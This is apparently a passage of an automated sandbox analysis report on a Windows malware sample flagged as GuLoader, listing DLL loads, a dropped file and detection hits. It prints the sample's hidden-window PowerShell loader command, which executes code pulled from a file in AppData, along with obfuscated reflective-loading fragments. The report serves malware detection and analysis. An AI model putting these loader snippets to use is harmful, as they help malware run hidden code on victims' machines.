Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\000027_A-000032.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 000027_A-000032.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000001.00000002.2329786451.0000000006F5A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Core.pdb= source: powershell.exe, 00000001.00000002.2324205397.0000000000404000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2329786451.0000000006F5A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbs@ source: powershell.exe, 00000001.00000002.2329786451.0000000006F5A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2336215560.0000000008F9D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Unhalved $Dolorously $Gvest), (Kayoing @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Saucing = [AppDomain]::CurrentDomain.GetAssemblies()$global:Philopub
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Phractamphibia)), $Standardvrks).DefineDynamicModule($Amtsraadets, $false).DefineType($Opstillingskredses, $Marekattene, [System.Multi

Suspicious powershell command line found

Source: C:\Users\user\Desktop\000027_A-000032.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Peptidases=Get-Content -Raw 'C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Jazzmusikers.Cam';$Inkorporerer=$Peptidases.SubString(55039,3);.$Inkorporerer($Peptidases)"
Source: C:\Users\user\Desktop\000027_A-000032.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Peptidases=Get-Content -Raw 'C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Jazzmusikers.Cam';$Inkorporerer=$Peptidases.SubString(55039,3);.$Inkorporerer($Peptidases)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0712EFDE push cs; iretd	1_2_0712EFDF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08E720C1 push 8BD38B50h; iretd	1_2_08E720C6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08E7195C push 8BD68B50h; iretd	1_2_08E71961
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_04262A19 push ss; retf	6_2_04262A1A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0426111D push eax; iretd	6_2_0426111E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Igaar\000027_A-000032.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\000027_A-000032.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
